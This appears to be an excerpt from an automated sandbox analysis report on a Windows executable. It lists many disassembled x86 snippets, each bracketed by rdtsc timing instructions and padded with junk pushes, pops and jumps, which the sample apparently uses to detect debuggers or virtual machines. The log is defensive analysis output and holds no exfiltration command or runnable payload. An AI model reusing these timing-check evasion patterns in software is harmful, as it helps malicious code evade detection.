            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 105AA46 second address: 105AA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007FF158548886h 0x0000000c popad 0x0000000d pushad 0x0000000e jnp 00007FF158548886h 0x00000014 jg 00007FF158548886h 0x0000001a jnl 00007FF158548886h 0x00000020 popad 0x00000021 popad 0x00000022 pushad 0x00000023 jns 00007FF158548892h 0x00000029 push edi 0x0000002a jmp 00007FF158548890h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 105A36F second address: 105A38D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jmp 00007FF158DB3902h 0x0000000a js 00007FF158DB38F6h 0x00000010 pop ebx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 105F908 second address: 105F90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 105F90E second address: 105F924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF158DB3901h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 105F924 second address: 105F929 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 105EE42 second address: 105EE4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 105EFCF second address: 105EFD4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 105F50E second address: 105F52E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF158DB390Bh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 105F52E second address: 105F534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1064BB2 second address: 1064BCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF158DB3902h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1064BCA second address: 1064BCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1064BCE second address: 1064BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FF158DB38F6h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1064D69 second address: 1064D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF15854888Dh 0x00000009 popad 0x0000000a jmp 00007FF158548896h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1064D91 second address: 1064D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF158DB38F6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1064D9D second address: 1064DA3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1064EE5 second address: 1064EF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF158DB38FCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1064EF7 second address: 1064EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1064EFB second address: 1064EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10651B8 second address: 10651BE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10651BE second address: 10651DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB3903h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1065304 second address: 106530E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF15854888Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1016957 second address: 101698B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF158DB38F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c mov ecx, 3522221Ch 0x00000011 push 00000004h 0x00000013 call 00007FF158DB38FEh 0x00000018 or edx, dword ptr [ebp+122D29B4h] 0x0000001e pop edi 0x0000001f push eax 0x00000020 pushad 0x00000021 pushad 0x00000022 push ecx 0x00000023 pop ecx 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1066101 second address: 1066105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1066105 second address: 1066126 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FF158DB3906h 0x0000000e jnp 00007FF158DB38F6h 0x00000014 jmp 00007FF158DB38FAh 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1069498 second address: 106949E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 106949E second address: 10694A8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF158DB38F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10694A8 second address: 10694C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF158548897h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10694C5 second address: 10694F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FF158DB3909h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007FF158DB38F6h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1068C0F second address: 1068C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF158548899h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FF158548897h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1068C4A second address: 1068C52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1068DA0 second address: 1068DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnc 00007FF158548886h 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1068DAD second address: 1068DB8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 js 00007FF158DB38F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1068F32 second address: 1068F36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 106922A second address: 106922F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1070D12 second address: 1070D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1070D22 second address: 1070D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FF158DB3902h 0x0000000b jmp 00007FF158DB38FCh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1070D3D second address: 1070D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF158548891h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1070D52 second address: 1070D56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 106ED9F second address: 106EDA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 106EF40 second address: 106EF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF158DB38F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 106EF4F second address: 106EF73 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jns 00007FF158548886h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF158548894h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 106EF73 second address: 106EF79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 106F0B6 second address: 106F0C8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF158548886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FF158548888h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 106F0C8 second address: 106F0D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 106F0D0 second address: 106F0D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 106F8E8 second address: 106F8F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF158DB38F6h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 106F8F3 second address: 106F8FA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 106FB75 second address: 106FB7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 106FB7F second address: 106FB83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 106FB83 second address: 106FB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF158DB38F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 106FEAB second address: 106FEAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 106FEAF second address: 106FEB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1073E0C second address: 1073E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1073E13 second address: 1073E18 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1077DAA second address: 1077DC4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FF158548894h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10781F0 second address: 10781F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10781F6 second address: 10781FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10781FA second address: 1078206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1078397 second address: 10783A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1086C0D second address: 1086C11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10873C9 second address: 10873D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10873D3 second address: 10873D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10873D9 second address: 10873DE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10873DE second address: 10873E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10873E7 second address: 10873EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10873EB second address: 10873F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1088475 second address: 1088479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1088479 second address: 108847D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1086327 second address: 1086331 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF158548886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 108E1BF second address: 108E1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 108E1C5 second address: 108E1E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnp 00007FF15854889Fh 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 108E1E9 second address: 108E1F8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF158DB38F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 108DD48 second address: 108DD69 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF15854888Ah 0x00000008 pushad 0x00000009 jmp 00007FF158548892h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 108DEB5 second address: 108DEBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 108DEBA second address: 108DEDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007FF158548886h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007FF15854888Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 jc 00007FF158548886h 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 109CEC9 second address: 109CECE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 109E966 second address: 109E96A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 109E96A second address: 109E9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FF158DB3905h 0x0000000c pop ecx 0x0000000d jmp 00007FF158DB38FFh 0x00000012 pushad 0x00000013 jmp 00007FF158DB3902h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 109E7BD second address: 109E7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 109E7C3 second address: 109E7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF158DB38FDh 0x00000009 popad 0x0000000a jmp 00007FF158DB38FFh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10A1CCA second address: 10A1CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jp 00007FF1585488A0h 0x0000000b jmp 00007FF158548894h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10A785F second address: 10A7865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10A7865 second address: 10A7873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007FF158548886h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10A7873 second address: 10A7891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF158DB3903h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10A7891 second address: 10A78A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF15854888Eh 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FCE3F2 second address: FCE3FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FF158DB38F6h 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10BAB3B second address: 10BAB4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF15854888Bh 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10B941E second address: 10B943C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF158DB3907h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10B943C second address: 10B9440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10B9440 second address: 10B944C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF158DB38F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10B944C second address: 10B9474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FF158548886h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007FF158548897h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10B9474 second address: 10B9480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF158DB38F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10B95BD second address: 10B95C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF158548886h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10B9DAD second address: 10B9DBD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FF158DB38F6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
